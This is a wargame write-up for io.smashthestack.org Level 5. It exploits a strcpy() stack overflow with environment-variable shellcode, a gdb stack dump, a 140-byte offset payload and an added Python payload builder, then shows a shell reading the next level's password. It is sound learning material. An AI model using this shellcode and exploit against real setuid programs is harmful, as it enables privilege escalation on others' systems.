io.smashthestack.org – Level 5

The source for Level 5 is as follows.

[code]#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {

        char buf[128];

        if(argc < 2) return 1;

        strcpy(buf, argv[1]);   /* no length check: an argv[1] longer than buf runs past it on the stack */

        printf("%s\n", buf);

        return 0;
}
[/code]

The problem is simple. argv[1] is copied into buf with strcpy(), which performs no bounds check, so an argument longer than the 128-byte buf overflows it and overwrites whatever lies above it on the stack, including the saved return address of main(). The working payload below shows that the return address slot sits 140 bytes past the start of buf (buf itself plus the alignment padding and saved frame pointer between it and the return address), so the 4 bytes after 140 bytes of filler become the new return address.

So the plan is to put NOP + SHELLCODE into an environment variable, confirm its address with gdb, and then run the attack. The shellcode used below does setuid(0) followed by execve("/bin//sh", ["/bin//sh"], NULL) and contains no NUL byte, which matters because both the environment string and strcpy() would stop copying at one. One caveat: the stack layout inside gdb is not identical to the one outside it (gdb adds LINES and COLUMNS to the environment, visible at the end of the dump below), so instead of returning to the exact start of the shellcode we return into the 100-byte NOP sled in front of it, which absorbs that shift.

[code lang-sh]level5@io:/levels$ ./level05 `python -c "print 'A'*140"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
level5@io:/levels$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level5@io:/levels$ gdb level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"…
(gdb) b main
Breakpoint 1 at 0x80483bd
(gdb) r
Starting program: /levels/level05

Breakpoint 1, 0x080483bd in main ()
(gdb) x/32wx $esp
0xbfffdc10:     0x00000000      0x00000000      0xbfffdcb0      0xbfffdca4
0xbfffdc20:     0x00000000      0x00000000      0x00000000      0xbfffdcf0
0xbfffdc30:     0x00855668      0x0804820b      0x00000000      0x00000000
0xbfffdc40:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffdc50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffdc60:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffdc70:     0x00000000      0x00000000      0xbfffde24      0x08048320
0xbfffdc80:     0x003bdff4      0x0804960c      0xbfffdc98      0x08048291
(gdb)
0xbfffdc90:     0x003bdff4      0xbfffdd4c      0xbfffdcb8      0x08048489
0xbfffdca0:     0x00848250      0x080482f0      0x00000000      0x003bdff4
0xbfffdcb0:     0x08048470      0x080482f0      0xbfffdd18      0x0029a455
0xbfffdcc0:     0x00000001      0xbfffdd44      0xbfffdd4c      0x00f8ab18
0xbfffdcd0:     0x00000001      0x00000001      0x00000000      0x0804820b
0xbfffdce0:     0x003bdff4      0x08048470      0x080482f0      0xbfffdd18
0xbfffdcf0:     0xebb98081      0x474835fe      0x00000000      0x00000000
0xbfffdd00:     0x00000000      0x0084d2e0      0x0029a37d      0x00854ff4
(gdb)
0xbfffdd10:     0x00000001      0x080482f0      0x00000000      0x08048311
0xbfffdd20:     0x080483b4      0x00000001      0xbfffdd44      0x08048470
0xbfffdd30:     0x08048420      0x00848250      0xbfffdd3c      0x00852ae5
0xbfffdd40:     0x00000001      0xbfffde24      0x00000000      0xbfffde34
0xbfffdd50:     0xbfffdec1      0xbfffded1      0xbfffdedc      0xbfffdefe
0xbfffdd60:     0xbfffdf11      0xbfffdf1d      0xbfffdf29      0xbfffdf56
0xbfffdd70:     0xbfffdf6c      0xbfffdf7b      0xbfffdf87      0xbfffdf90
0xbfffdd80:     0xbfffdfa2      0xbfffdfaa      0xbfffdfb9      0x00000000
(gdb)
0xbfffdd90:     0x00000010      0xbfebfbff      0x00000006      0x00001000
0xbfffdda0:     0x00000011      0x00000064      0x00000003      0x08048034
0xbfffddb0:     0x00000004      0x00000020      0x00000005      0x00000007
0xbfffddc0:     0x00000007      0x0083a000      0x00000008      0x00000000
0xbfffddd0:     0x00000009      0x080482f0      0x0000000b      0x000003ed
0xbfffdde0:     0x0000000c      0x000003ed      0x0000000d      0x000003ed
0xbfffddf0:     0x0000000e      0x000003ed      0x00000017      0x00000000
0xbfffde00:     0x0000000f      0xbfffde1b      0x00000000      0x00000000
(gdb)
0xbfffde10:     0x00000000      0x00000000      0x69000000      0x00363836
0xbfffde20:     0x00000000      0x76656c2f      0x2f736c65      0x6576656c
0xbfffde30:     0x0035306c      0x4c454853      0x444f434c      0x90903d45
0xbfffde40:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde50:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde60:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde70:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde80:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb)
0xbfffde90:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffdea0:     0x176a9090      0xcddb3158      0x580b6a80      0x2f685299
0xbfffdeb0:     0x6868732f      0x6e69622f      0x5352e389      0x80cde189
0xbfffdec0:     0x45485300      0x2f3d4c4c      0x2f6e6962      0x68736162
0xbfffded0:     0x52455400      0x696c3d4d      0x0078756e      0x5f485353
0xbfffdee0:     0x45494c43      0x323d544e      0x322e3131      0x312e3831
0xbfffdef0:     0x39392e36      0x39333220      0x32203034      0x53530032
0xbfffdf00:     0x54545f48      0x642f3d59      0x702f7665      0x322f7374
(gdb)
0xbfffdf10:     0x45535500      0x656c3d52      0x356c6576      0x4c4f4300
0xbfffdf20:     0x534e4d55      0x3134313d      0x54415000      0x752f3d48
0xbfffdf30:     0x6c2f7273      0x6c61636f      0x6e69622f      0x73752f3a
0xbfffdf40:     0x69622f72      0x622f3a6e      0x2f3a6e69      0x2f727375
0xbfffdf50:     0x656d6167      0x414d0073      0x2f3d4c49      0x2f726176
0xbfffdf60:     0x6c69616d      0x76656c2f      0x00356c65      0x752f3d5f
0xbfffdf70:     0x622f7273      0x672f6e69      0x50006264      0x2f3d4457
0xbfffdf80:     0x6576656c      0x4c00736c      0x53454e49      0x0038323d
(gdb) q
The program is running.  Exit anyway? (y or n) y
level5@io:/levels$ ./level05 `python -c "print 'A'*140 + '\x60\xde\xff\xbf'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`??
sh-3.2$ id
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1005(level5),1029(nosu)
sh-3.2$ cat /home/level06/.pass
cat: /home/level06/.pass: No such file or directory
sh-3.2$ cat /home/level6/.pass
mobjy2we
sh-3.2$
[/code]
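The two manual steps above, reading the return address off the gdb dump and pasting it into a python one-liner, are easy to get wrong by a byte. The script below is an added example, not part of the original write-up: it parses the `x/32wx` lines copied from the dump above (the eight lines covering SHELLCODE=), swaps each little-endian word back into memory order, finds the NOP run that follows `SHELLCODE=`, aims at the middle of that sled, and emits the argv payload. The shellcode, the 100-byte sled and the 140-byte offset are taken from the write-up; the file name build_payload.py, the function names and the midpoint choice are my own assumptions.

```python
"""Added example (not from the write-up): locate the NOP sled in a gdb
dump and build the Level 5 payload from it. File name build_payload.py,
the function names and the sled-midpoint choice are assumptions; the
shellcode, offset and dump excerpt come from the write-up."""
import re
import struct
import sys

# Shellcode from the write-up: setuid(0), then execve("/bin//sh", ["/bin//sh"], NULL).
SHELLCODE = (
    b"\x6a\x17\x58\x31\xdb\xcd\x80"      # push 0x17; pop eax; xor ebx,ebx; int 0x80
    b"\x6a\x0b\x58\x99\x52"               # push 0xb; pop eax; cdq; push edx (NULL)
    b"\x68//sh\x68/bin"                   # push "//sh"; push "/bin"
    b"\x89\xe3\x52\x53\x89\xe1\xcd\x80"   # ebx=path; push NULL; push ebx; ecx=argv; int 0x80
)

# Excerpt of the `x/32wx $esp` output from the write-up, covering SHELLCODE=...
GDB_DUMP = """\
0xbfffde30:     0x0035306c      0x4c454853      0x444f434c      0x90903d45
0xbfffde40:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde50:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde60:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde70:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde80:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde90:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffdea0:     0x176a9090      0xcddb3158      0x580b6a80      0x2f685299
"""

RET_OFFSET = 140  # bytes from the start of buf to the saved return address (from the write-up)


def parse_gdb_words(dump):
    """Turn `x/Nwx` lines into (base_address, bytes) in memory order.
    gdb prints each 32-bit word as a little-endian integer, so the bytes
    must be swapped back before searching for strings in the dump."""
    line_re = re.compile(r"^(0x[0-9a-fA-F]+):\s+(.+)$")
    base, mem = None, bytearray()
    for line in dump.splitlines():
        m = line_re.match(line.strip())
        if not m:
            continue  # skip "(gdb)" prompts and anything that is not a dump line
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != base + len(mem):
            raise ValueError("dump is not contiguous at %#x" % addr)
        for word in m.group(2).split():
            mem += struct.pack("<I", int(word, 16))
    return base, bytes(mem)


def find_sled(base, mem, name=b"SHELLCODE="):
    """Return (start, end) addresses of the 0x90 run that follows NAME in MEM."""
    i = mem.find(name)
    if i < 0:
        raise ValueError("%r not found in dump" % name)
    start = i + len(name)
    end = start
    while end < len(mem) and mem[end] == 0x90:
        end += 1
    if end == start:
        raise ValueError("no NOP sled after %r" % name)
    return base + start, base + end


def pick_return_address(sled_start, sled_end):
    """Aim at the middle of the sled so a slightly shifted stack still lands on a NOP."""
    return (sled_start + sled_end) // 2


def nul_free(data, what):
    """strcpy() and the environment both stop at the first NUL, so refuse such payloads."""
    if b"\x00" in data:
        raise ValueError("%s contains a NUL byte" % what)
    return data


def build_env_value(nops=100):
    """Value for `export SHELLCODE=...`: NOP sled followed by the shellcode."""
    return nul_free(b"\x90" * nops + SHELLCODE, "environment value")


def build_argv_payload(ret_addr, offset=RET_OFFSET):
    """argv[1]: filler up to the return address slot, then the address little-endian."""
    return nul_free(b"A" * offset + struct.pack("<I", ret_addr), "argv payload")


if __name__ == "__main__":
    base, mem = parse_gdb_words(GDB_DUMP)
    start, end = find_sled(base, mem)
    ret = pick_return_address(start, end)
    sys.stderr.write("NOP sled %#x-%#x, returning to %#x\n" % (start, end, ret))
    sys.stdout.buffer.write(build_argv_payload(ret))
```

With the same SHELLCODE variable exported, the payload is delivered as `./level05 "$(python3 build_payload.py)"`. On this dump the sled runs from 0xbfffde3e to 0xbfffdea2 and the script returns to 0xbfffde70; the write-up's 0xbfffde60 sits inside the same sled, so both work. Any address found this way is only valid for the environment it was measured in: a different set of environment variables or a different argv[0] length moves the whole stack, and the sled is what keeps the exploit working when that shift is small.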
